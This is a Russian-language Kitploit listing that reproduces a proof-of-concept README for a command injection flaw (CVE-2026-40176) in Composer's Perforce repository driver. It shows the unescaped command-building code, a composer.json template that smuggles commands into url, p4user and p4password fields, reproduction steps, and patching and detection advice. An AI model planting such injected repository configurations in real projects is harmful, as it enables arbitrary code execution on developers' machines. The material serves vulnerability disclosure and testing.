Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2026-40176-cve-2026-40261 — Доказательство концепции, демонстрирующее внедрение команд в драйвер Perforce в Composer (CVE-2026-40176), позволяющее удалённое выполнение кода через специально сформированную конфигурацию репозитория. | Kitploit
Инструменты/GitHubGitHub/dapthehuman/cve-2026-40176-cve-2026-40261
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийКомандование и УправлениеРазработка Полезной Нагрузки
GitHubdapthehuman/cve-2026-40176-cve-2026-40261

cve-2026-40176-cve-2026-40261

Доказательство концепции, демонстрирующее внедрение команд в драйвер Perforce в Composer (CVE-2026-40176), позволяющее удалённое выполнение кода через специально сформированную конфигурацию репозитория.

Репозиторий
4 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-40176

Удаленное выполнение кода (RCE) в Perforce-репозитории Composer

Composer Version Severity Type


📋 Краткое описание

Уязвимость внедрения команд (Command Injection) в драйвере Perforce-репозитория Composer, позволяющая выполнить удаленный код (RCE) из-за недостаточной проверки входных данных при обработке URL-адресов репозиториев.


🎯 Сведения об уязвимости

СвойствоЗначение
ID CVECVE-2026-40176
Затронутые версииComposer < 2.2.27
Тип уязвимостиВнедрение команд
Вектор атакиВредоносная конфигурация репозитория
ВоздействиеВыполнение произвольного кода
Оценка CVSSВысокая/Критическая

🔍 Техническое описание

Уязвимость существует в том, как Composer обрабатывает репозитории типа perforce. Параметр не проходит должную санитизацию перед передачей в shell-команды, что позволяет злоумышленникам внедрять произвольные системные команды.

root@kitploit:~

    public function generateP4Command($command, $useClient = true)
    {
        $p4Command = 'p4 ';
        $p4Command .= '-u ' . $this->getUser() . ' ';
        if ($useClient) 
            $p4Command .= '-c ' . $this->getClient() . ' ';
        }
        $p4Command .= '-p ' . $this->getPort() . ' ' . $command;

        return $p4Command;
    }

Все это не было должным образом экранировано, что позволяет атакующему внедрять команды, создавая вредоносную полезную нагрузку для всех полей с типом perforce.

Уязвимый шаблон кода:

root@kitploit:~
{
  "repositories": [
    {
      "type": "perforce",
      "url": "PERFORCE_URL; INJECTED_COMMAND #",
      "depot": "depot",
      "p4user": "user; INJECRTED_COMMAND #",
      "p4password": "password; INJECTED_COMMAND #",
    }
  ]
}

🚀 Доказательство концепции

Этот репозиторий содержит рабочее доказательство концепции, демонстрирующее уязвимость.

Структура проекта

root@kitploit:~
CVE-2026-40176/
├── composer.json              # Вредоносная конфигурация Perforce-репозитория
├── vuln-composer.phar         # Composer 2.2.26 (УЯЗВИМАЯ)
├── patched-composer.phar      # Composer 2.2.27 (ИСПРАВЛЕННАЯ)
└── README.md                  # Этот файл

Шаги воспроизведения

1. Клонируйте репозиторий

root@kitploit:~
git clone <repository-url>
cd CVE-2026-40176

2. Проверьте версии Composer

root@kitploit:~
php vuln-composer.phar --version
# Вывод: Composer version 2.2.26

php patched-composer.phar --version
# Вывод: Composer version 2.2.27

3. Протестируйте уязвимую версию

root@kitploit:~
php vuln-composer.phar install
# ИЛИ
php vuln-composer.phar update

4. Проверьте эксплуатацию

root@kitploit:~
ls -la /tmp/pwned

5. Протестируйте исправленную версию (должна завершиться неудачей)

root@kitploit:~
rm -f /tmp/pwned
php patched-composer.phar update
ls -la /tmp/pwned
# Файл НЕ должен существовать (уязвимость исправлена)

🛡️ Меры по смягчению последствий

Немедленные действия

  1. Обновите Composer до версии 2.2.27 или новее:

    root@kitploit:~
    composer self-update --2.2.27
    # ИЛИ
    wget https://getcomposer.org/download/2.2.27/composer.phar
    
  2. Проверьте все файлы composer.json на наличие неизвестных или подозрительных конфигураций репозиториев

  3. Проведите аудит цепочки поставок — проверьте, не ссылаются ли какие-либо зависимости на недоверенные репозитории

Обнаружение

root@kitploit:~
# Проверьте версию Composer
composer --version

# Поиск Perforce-репозиториев в ваших проектах
grep -r "perforce" */composer.json
Скачать инструмент